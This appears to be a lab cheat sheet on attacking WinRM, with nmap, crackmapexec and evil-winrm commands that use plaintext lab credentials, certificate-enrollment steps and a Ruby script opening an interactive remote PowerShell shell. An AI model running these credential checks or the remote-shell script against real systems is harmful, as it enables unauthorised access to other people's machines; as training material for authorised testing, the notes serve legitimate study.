# Footprinting (5985 = WinRM over HTTP, 5986 = WinRM over HTTPS)
Intrusionz3r0X@htb[/htb]$ nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n
#Verify password
Intrusionz3r0X@htb[/htb]$ crackmapexec winrm 10.10.11.222 -u 'ansible' -p 'DevT3st@123'
# Log into WinRM (evil-winrm defaults to 5985/HTTP; add -S for 5986/HTTPS, as in the certificate example below)
Intrusionz3r0X@htb[/htb]$ evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!
Intrusionz3r0X@htb[/htb]$ evil-winrm -S -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -c certnew.cert -k mykey.key
If you hit an error like this, the endpoint expects client-certificate authentication: generate a private key and a certificate signing request (CSR), submit the CSR to the server's certificate enrollment page, and download the certificate it issues.
# Generate private key
openssl genrsa -out mykey.key 2048
# Create a certificate signing request (CSR)
openssl req -new -key mykey.key -out request.csr
Copy the contents of request.csr, paste them into the enrollment form and submit. If everything is fine, the server issues a certificate to download. Keep mykey.key private — together with the issued certificate it is now the credential for this host — and make sure the certificate file name you pass to evil-winrm `-c` (or `client_cert:` in the Ruby script) matches the file you downloaded (`certnew.cert` vs `certnew.cer` above).
require 'winrm'
# Author: Alamot
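# Interactive remote PowerShell over WinRM (port 5986) using TLS client-certificate
# authentication. Connection settings default to the original hard-coded values
# but can be overridden via environment variables so the script need not be edited.
conn = WinRM::Connection.new(
  endpoint: ENV.fetch('WINRM_ENDPOINT', 'https://10.10.10.103:5986/wsman'),
  transport: :ssl,
  client_cert: ENV.fetch('WINRM_CLIENT_CERT', 'certnew.cer'),
  client_key: ENV.fetch('WINRM_CLIENT_KEY', 'mykey.key'),
  # Password auth is the alternative to the certificate. Do not commit real
  # credentials here; if you need this path, read them from the environment.
  # user: ENV['WINRM_USER'],
  # password: ENV['WINRM_PASSWORD'],
  # WARNING: disables validation of the server's TLS certificate. Tolerable against
  # a lab host with a self-signed cert, but it leaves the session open to a
  # man-in-the-middle who can then relay the client-certificate handshake and read
  # everything typed. Prefer trusting the issuing CA (the gem's ca_trust_path option)
  # and set WINRM_INSECURE=false once you have it.
  no_ssl_peer_verification: ENV.fetch('WINRM_INSECURE', 'true') == 'true'
)

command = ''
output = nil
conn.shell(:powershell) do |shell|
  # Loop until the user types "exit"; that line is still sent to the remote shell first.
  until command == "exit\n"
    # Build a PS-style prompt on the remote side so the local user sees whoami@host dir>.
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    # gets returns nil on EOF (Ctrl-D / closed stdin); without this guard nil would be
    # passed to shell.run and the loop would spin.
    break if command.nil?
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  # output is always set here: the prompt command runs before any break.
  puts "Exiting with code #{output.exitcode}"
end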